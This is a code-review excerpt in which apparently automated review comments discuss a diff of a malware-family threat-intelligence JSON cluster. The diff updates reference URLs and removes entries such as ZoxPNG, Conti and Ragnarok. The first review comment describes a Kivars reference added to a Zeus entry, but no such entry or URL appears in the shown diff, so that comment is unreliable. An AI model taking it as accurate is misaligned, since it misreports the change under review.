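Review bot: The ref `https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/` added to the Zeus entry in this hunk does not, by its title, concern Zeus, so it looks like a mislabelled reference carried over from the Malpedia export and is worth checking there before it propagates to consumers of this cluster. The other changes in the hunk only reorder and extend the reference list.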
@@ -18705,8 +33676,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", - "https://twitter.com/siri_urz/status/923479126656323584", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" + "https://twitter.com/siri_urz/status/923479126656323584" ], "synonyms": [], "type": [] @@ -18732,7 +33702,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf" ], "synonyms": [], "type": [] 
@@ -18740,17 +33711,81 @@ "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo", + "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/" + ], + "synonyms": [ + "ZeuS-in-the-Mobile" + ], + "type": [] + }, + "uuid": "6f08bd79-d22a-471c-882b-f68a42eb4a23", + "value": "ZitMo" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c23aac20-4987-4c15-af63-7043026c5f82", + "value": "ZiyangRAT" + }, { "description": "This family describes the (initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. 
Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", - "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", + "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", - "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://johannesbader.ch/blog/the-dga-of-zloader/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", - "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/" + 
"https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", + "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", + "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.youtube.com/watch?v=QBoj6GB79wM", + "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/", + "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", + "https://blog.alyac.co.kr/3322", + 
"https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", + "https://www.lac.co.jp/lacwatch/people/20201106_002321.html" ], "synonyms": [ "DELoader", 
@@ -18765,25 +33800,48 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", - "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ], - "synonyms": [ - "gresim" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob", + "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/", + "https://en.wikipedia.org/wiki/Zlob_trojan" ], + "synonyms": [], "type": [] }, - "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG" + "uuid": "ddccba7e-89f3-4b51-803c-e473ca5623da", + "value": "Zlob" }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater", + "https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/" + ], + "synonyms": [ + "Zpevdo" + ], + "type": [] + }, + "uuid": "36a54d23-39ea-446c-b690-6a899890773d", + "value": "ZUpdater" + }, + { + "description": "According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. 
Simplified Chinese is the language used for the bundled ZXSHELL documentation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", + "https://risky.biz/whatiswinnti/", "https://github.com/smb01/zxshell", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://blogs.rsa.com/cat-phishing/" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf" ], "synonyms": [ "Sensocode" 
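Review bot: This hunk removes the ZoxPNG element (`win.zoxpng`, uuid `7078d273-8a2d-477a-b6d9-7313e22d9ad7`) and the final hunk removes MedusaLocker, Raccoon, Ragnarok and Conti together with their UUIDs, but nothing in the visible diff re-adds those UUIDs; if they are not present elsewhere in the regenerated file, any event or relationship that references them by UUID is orphaned, since galaxy element UUIDs are meant to stay stable across updates. MedusaLocker, Raccoon and Conti carry Malpedia references, so the export presumably recreates them under Malpedia's own UUIDs, but Ragnarok has no Malpedia reference at all and therefore nothing to be regenerated from. Consider retaining those elements, or at least listing the dropped UUIDs and their replacements in the commit message.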
@@ -18799,71 +33857,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", - "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html", - "https://asert.arbornetworks.com/wp-content/uploads/2017/05/zyklon_season.pdf" + "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html" ], "synonyms": [], "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" - }, - { - "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker" - ], - "synonyms": [], - "type": [] - }, - "uuid": "237a1c2e-fb14-583d-ab2c-71f10a52ec06", - "value": "MedusaLocker" - }, - { - "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", - "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", - "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block" - ], - "synonyms": [ - "Racoon" - ], - "type": [] - }, - "uuid": "10c03b2e-5e53-11ea-ac08-00163cdbc7b4", - "value": "Raccoon" - }, - { - "description": "According 
to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/", - "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw" - ], - "synonyms": [], - "type": [] - }, - "uuid": "10c03b2f-5e52-01ea-bc08-00153cdbc7b3", - "value": "Ragnarok" - }, - { - "description": "Conti is a new family of ransomware observed in the wild by the Carbon Black Threat Analysis Unit (TAU). Unlike most ransomware, Conti contains unique features that separate it in terms of performance and focus on network-based targets.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", - "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "10c03b2e-5f52-01fa-ac08-00253cdbc6b3", - "value": "Conti" } ], - "version": 2564 -} + "version": 8790 +}